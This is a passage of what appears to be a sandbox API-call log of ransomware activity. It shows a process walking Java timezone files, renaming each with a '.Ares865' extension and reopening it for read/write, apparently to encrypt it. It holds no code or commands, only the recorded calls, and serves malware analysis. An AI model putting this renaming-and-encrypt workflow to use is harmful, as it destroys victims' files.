Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.Ares865") returned 61 [0135.928] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul.ares865"), dwFlags=0x1) returned 1 [0135.930] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.930] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.934] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Bissau" | out: lpString1="Bissau") returned="Bissau" [0135.934] lstrlenW (lpString="Bissau") returned 6 [0135.934] lstrlenW (lpString="Ares865") returned 7 [0135.935] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.Ares865") returned 61 [0135.935] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau.ares865"), dwFlags=0x1) returned 1 [0135.936] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.936] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.939] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Blantyre" | out: lpString1="Blantyre") returned="Blantyre" [0135.939] lstrlenW (lpString="Blantyre") returned 8 [0135.940] lstrlenW (lpString="Ares865") returned 7 [0135.940] lstrcmpiW (lpString1="lantyre", lpString2="Ares865") returned 1 [0135.940] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.Ares865") returned 63 [0135.940] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre.ares865"), dwFlags=0x1) returned 1 [0135.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.967] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Brazzaville" | out: lpString1="Brazzaville") returned="Brazzaville" [0135.967] lstrlenW (lpString="Brazzaville") returned 11 [0135.967] lstrlenW (lpString="Ares865") returned 7 [0135.967] lstrcmpiW (lpString1="zaville", lpString2="Ares865") returned 1 [0135.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.Ares865") returned 66 [0135.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville.ares865"), dwFlags=0x1) returned 1 [0135.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.969] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.973] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Bujumbura" | out: lpString1="Bujumbura") returned="Bujumbura" [0135.973] lstrlenW (lpString="Bujumbura") returned 9 [0135.973] lstrlenW (lpString="Ares865") returned 7 [0135.973] lstrcmpiW (lpString1="jumbura", lpString2="Ares865") returned 1 [0135.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.Ares865") returned 64 [0135.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura.ares865"), dwFlags=0x1) returned 1 [0135.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0135.978] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Cairo" | out: lpString1="Cairo") returned="Cairo" [0135.978] lstrlenW (lpString="Cairo") returned 5 [0135.978] lstrlenW (lpString="Ares865") returned 7 [0135.979] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.Ares865") returned 60 [0135.979] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo.ares865"), dwFlags=0x1) returned 1 [0135.980] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.980] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1049) returned 1 [0135.983] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Casablanca" | out: lpString1="Casablanca") returned="Casablanca" [0135.983] lstrlenW (lpString="Casablanca") returned 10 [0135.983] lstrlenW (lpString="Ares865") returned 7 [0135.983] lstrcmpiW (lpString1="ablanca", lpString2="Ares865") returned -1 [0135.983] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.Ares865") returned 65 [0135.983] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca.ares865"), dwFlags=0x1) returned 1 [0135.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.985] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=848) returned 1 [0135.987] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Ceuta" | out: lpString1="Ceuta") returned="Ceuta" [0135.988] lstrlenW (lpString="Ceuta") returned 5 [0135.988] lstrlenW (lpString="Ares865") returned 7 [0135.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.Ares865") returned 60 [0135.988] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta.ares865"), dwFlags=0x1) returned 1 [0135.990] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.991] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1112) returned 1 [0135.993] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Conakry" | out: lpString1="Conakry") returned="Conakry" [0135.993] lstrlenW (lpString="Conakry") returned 7 [0135.993] lstrlenW (lpString="Ares865") returned 7 [0135.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.Ares865") returned 62 [0135.994] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry.ares865"), dwFlags=0x1) returned 1 [0135.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0135.999] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Dakar" | out: lpString1="Dakar") returned="Dakar" [0135.999] lstrlenW (lpString="Dakar") returned 5 [0135.999] lstrlenW (lpString="Ares865") returned 7 [0135.999] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.Ares865") returned 60 [0135.999] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar.ares865"), dwFlags=0x1) returned 1 [0136.001] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.001] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0136.004] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Dar_es_Salaam" | out: lpString1="Dar_es_Salaam") returned="Dar_es_Salaam" [0136.004] lstrlenW (lpString="Dar_es_Salaam") returned 13 [0136.004] lstrlenW (lpString="Ares865") returned 7 [0136.004] lstrcmpiW (lpString1="_Salaam", lpString2="Ares865") returned -1 [0136.004] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.Ares865") returned 68 [0136.004] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam.ares865"), dwFlags=0x1) returned 1 [0136.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0136.009] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Djibouti" | out: lpString1="Djibouti") returned="Djibouti" [0136.009] lstrlenW (lpString="Djibouti") returned 8 [0136.009] lstrlenW (lpString="Ares865") returned 7 [0136.009] lstrcmpiW (lpString1="jibouti", lpString2="Ares865") returned 1 [0136.010] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.Ares865") returned 63 [0136.010] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti.ares865"), dwFlags=0x1) returned 1 [0136.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.015] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Douala" | out: lpString1="Douala") returned="Douala" [0136.015] lstrlenW (lpString="Douala") returned 6 [0136.015] lstrlenW (lpString="Ares865") returned 7 [0136.015] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.Ares865") returned 61 [0136.015] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala.ares865"), dwFlags=0x1) returned 1 [0136.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.020] lstrcpyW (in: lpString1=0x2cce45e, lpString2="El_Aaiun" | out: lpString1="El_Aaiun") returned="El_Aaiun" [0136.020] lstrlenW (lpString="El_Aaiun") returned 8 [0136.020] lstrlenW (lpString="Ares865") returned 7 [0136.020] lstrcmpiW (lpString1="l_Aaiun", lpString2="Ares865") returned 1 [0136.021] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.Ares865") returned 63 [0136.021] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun.ares865"), dwFlags=0x1) returned 1 [0136.022] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.022] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0136.025] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Freetown" | out: lpString1="Freetown") returned="Freetown" [0136.025] lstrlenW (lpString="Freetown") returned 8 [0136.025] lstrlenW (lpString="Ares865") returned 7 [0136.025] lstrcmpiW (lpString1="reetown", lpString2="Ares865") returned 1 [0136.026] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.Ares865") returned 63 [0136.026] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown.ares865"), dwFlags=0x1) returned 1 [0136.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.028] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=313) returned 1 [0136.031] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Gaborone" | out: lpString1="Gaborone") returned="Gaborone" [0136.031] lstrlenW (lpString="Gaborone") returned 8 [0136.031] lstrlenW (lpString="Ares865") returned 7 [0136.031] lstrcmpiW (lpString1="aborone", lpString2="Ares865") returned -1 [0136.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.Ares865") returned 63 [0136.031] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone.ares865"), dwFlags=0x1) returned 1 [0136.033] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0136.036] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Harare" | out: lpString1="Harare") returned="Harare" [0136.036] lstrlenW (lpString="Harare") returned 6 [0136.037] lstrlenW (lpString="Ares865") returned 7 [0136.037] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.Ares865") returned 61 [0136.037] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare.ares865"), dwFlags=0x1) returned 1 [0136.039] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.042] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Johannesburg" | out: lpString1="Johannesburg") returned="Johannesburg" [0136.042] lstrlenW (lpString="Johannesburg") returned 12 [0136.042] lstrlenW (lpString="Ares865") returned 7 [0136.042] lstrcmpiW (lpString1="nesburg", lpString2="Ares865") returned 1 [0136.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.Ares865") returned 67 [0136.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg.ares865"), dwFlags=0x1) returned 1 [0136.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.044] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=105) returned 1 [0136.047] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Juba" | out: lpString1="Juba") returned="Juba" [0136.047] lstrlenW (lpString="Juba") returned 4 [0136.047] lstrlenW (lpString="Ares865") returned 7 [0136.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba.Ares865") returned 59 [0136.047] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba.ares865"), dwFlags=0x1) returned 1 [0136.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Juba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\juba.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=337) returned 1 [0136.058] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kampala" | out: lpString1="Kampala") returned="Kampala" [0136.058] lstrlenW (lpString="Kampala") returned 7 [0136.058] lstrlenW (lpString="Ares865") returned 7 [0136.058] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.Ares865") returned 62 [0136.058] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala.ares865"), dwFlags=0x1) returned 1 [0136.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.060] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0136.063] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Khartoum" | out: lpString1="Khartoum") returned="Khartoum" [0136.063] lstrlenW (lpString="Khartoum") returned 8 [0136.063] lstrlenW (lpString="Ares865") returned 7 [0136.063] lstrcmpiW (lpString1="hartoum", lpString2="Ares865") returned 1 [0136.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.Ares865") returned 63 [0136.064] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.Ares865" (normalized: "c:\\program files 